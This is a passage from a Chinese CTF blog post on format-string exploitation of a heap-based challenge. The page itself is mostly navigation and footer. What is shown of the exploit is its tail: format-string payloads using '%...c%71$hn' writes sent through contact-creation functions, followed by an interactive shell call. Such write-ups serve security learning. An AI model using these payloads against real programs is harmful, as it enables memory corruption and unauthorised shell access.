number">0x32</span><span class="token punctuation">)</span><span class="token punctuation">,</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="122"></td><td><pre>printcontact<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="123"></td><td><pre></pre></td></tr><tr><td data-num="124"></td><td><pre>pl <span class="token operator">=</span> <span class="token string">'%'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span>pl2<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'c%71$hn'</span></pre></td></tr><tr><td data-num="125"></td><td><pre>createcontact<span class="token punctuation">(</span><span class="token string">'huan'</span><span class="token punctuation">,</span><span class="token string">'1111'</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token number">0x32</span><span class="token punctuation">)</span><span class="token punctuation">,</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="126"></td><td><pre>printcontact<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="127"></td><td><pre></pre></td></tr><tr><td data-num="128"></td><td><pre>ru<span class="token punctuation">(</span><span class="token string">'>>> '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="129"></td><td><pre>sl<span class="token punctuation">(</span><span class="token string">'5'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="130"></td><td><pre></pre></td></tr><tr><td data-num="131"></td><td><pre></pre></td></tr><tr><td data-num="132"></td><td><pre>it<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure>
      <div class="tags">
          <a href="/tags/%E5%A0%86%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/" rel="tag"><i class="ic i-tag"></i> 堆——格式化字符串</a>
          <a href="/tags/%E6%A0%88%E8%BF%81%E7%A7%BB/" rel="tag"><i class="ic i-tag"></i> 栈迁移</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2024-07-29 21:58:12" itemprop="dateModified" datetime="2024-07-29T21:58:12+08:00">2024-07-29</time>
  </span>
  <span id="2024/07/29/堆上格式化字符利用/" class="item leancloud_visitors" data-flag-title="堆上格式化字符利用" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>yhuanhuan <i class="ic i-at"><em>@</em></i>
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://yhuanhuan01.github.io/2024/07/29/%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8/" title="堆上格式化字符利用">https://yhuanhuan01.github.io/2024/07/29/堆上格式化字符利用/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2024/07/26/house-of-rabbit/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;PavyAqzTMBH8QjR.png" title="house-of-rabbit">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> 堆攻击</span>
  <h3>house-of-rabbit</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2024/08/06/TFCCTF_PWN/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;08&#x2F;03&#x2F;jDNXms1oWOKuYIM.png" title="TFCCTF_PWN">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> Write_up</span>
  <h3>TFCCTF_PWN</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8"><span class="toc-number">1.</span> <span class="toc-text"> 堆上格式化字符利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">1.0.1.</span> <span class="toc-text"> 利用思路：</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2024/07/12/house-of-spirit/" rel="bookmark" title="house-of-spirit">house-of-spirit</a></li><li><a href="/2024/07/13/house-of-einherjar/" rel="bookmark" title="house-of-einherjar">house-of-einherjar</a></li><li><a href="/2024/07/15/house-of-orange/" rel="bookmark" title="house-of-orange">house-of-orange</a></li><li><a href="/2024/07/19/house-of-force/" rel="bookmark" title="house-of-force">house-of-force</a></li><li><a href="/2024/07/22/tcache-stashing-unlink-attack(house-of-lore)/" rel="bookmark" title="tcache-stashing-unlink-attack(house-of-lore)">tcache-stashing-unlink-attack(house-of-lore)</a></li><li><a href="/2024/07/26/house-of-rabbit/" rel="bookmark" title="house-of-rabbit">house-of-rabbit</a></li><li class="active"><a href="/2024/07/29/%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8/" rel="bookmark" title="堆上格式化字符利用">堆上格式化字符利用</a></li><li><a href="/2024/08/30/house-of-apple/" rel="bookmark" title="house-of-apple">house-of-apple</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="yhuanhuan"
      data-src="/images/huanhuan.png">
  <p class="name" itemprop="name">yhuanhuan</p>
  <div class="description" itemprop="description">欢迎来到Huan的笔记空间~~~~~~🌸</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">42</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">11</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">40</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lodWFuaHVhbjAx" title="https:&#x2F;&#x2F;github.com&#x2F;yhuanhuan01"><i class="ic i-github"></i></span>
      <span class="exturl item email" data-url="bWFpbHRvOjI4OTQ3NDIyMTRAcXEuY29t" title="mailto:2894742214@qq.com"><i class="ic i-envelope"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2024/07/26/house-of-rabbit/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2024/08/06/TFCCTF_PWN/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2024/05/10/CVE-2023-27021/" title="CVE-2023-27021">CVE-2023-27021</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" title="分类于 堆攻击">堆攻击</a>
</div>

    <span><a href="/2024/07/12/house-of-spirit/" title="house-of-spirit">house-of-spirit</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2024/05/10/%E5%85%B3%E4%BA%8E%E6%81%A2%E5%A4%8D%E7%AC%A6%E5%8F%B7%E8%A1%A8%E8%BF%99%E4%BB%B6%E4%BA%8B/" title="关于恢复符号表这件事">关于恢复符号表这件事</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/11/15/%E6%8A%80%E8%83%BD%E5%85%B4%E9%B2%81/" title="技能兴鲁">技能兴鲁</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/03/srop/" title="srop">srop</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2023/10/24/FSCTF-wp/" title="FSCTF_wp">FSCTF_wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/08/04/b-canary/" title="b_canary">b_canary</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/" title="分类于 PWN的学习">PWN的学习</a>
<i class="ic i-angle-right"></i>
<a href="/categories/PWN%E7%9A%84%E5%AD%A6%E4%B9%A0/%E6%8A%80%E5%B7%A7/" title="分类于 技巧">技巧</a>
</div>

    <span><a href="/2023/09/22/picture/new-pwn/" title="new_pwn">new_pwn</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%A4%8D%E7%8E%B0/" title="分类于 复现">复现</a>
</div>

    <span><a href="/2024/07/06/2024%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E5%A4%8F%E5%AD%A3%E8%B5%9B/" title="2024春秋杯网络安全联赛夏季赛">2024春秋杯网络安全联赛夏季赛</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Write-up/" title="分类于 Write_up">Write_up</a>
</div>

    <span><a href="/2024/08/06/TFCCTF_PWN/" title="TFCCTF_PWN">TFCCTF_PWN</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">yhuanhuan @ yhuanhuan</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">376k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">5:42</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2024/07/29/堆上格式化字符利用/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"bottom","width":150,"height":300,"hOffset":-15,"vOffset":-15},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
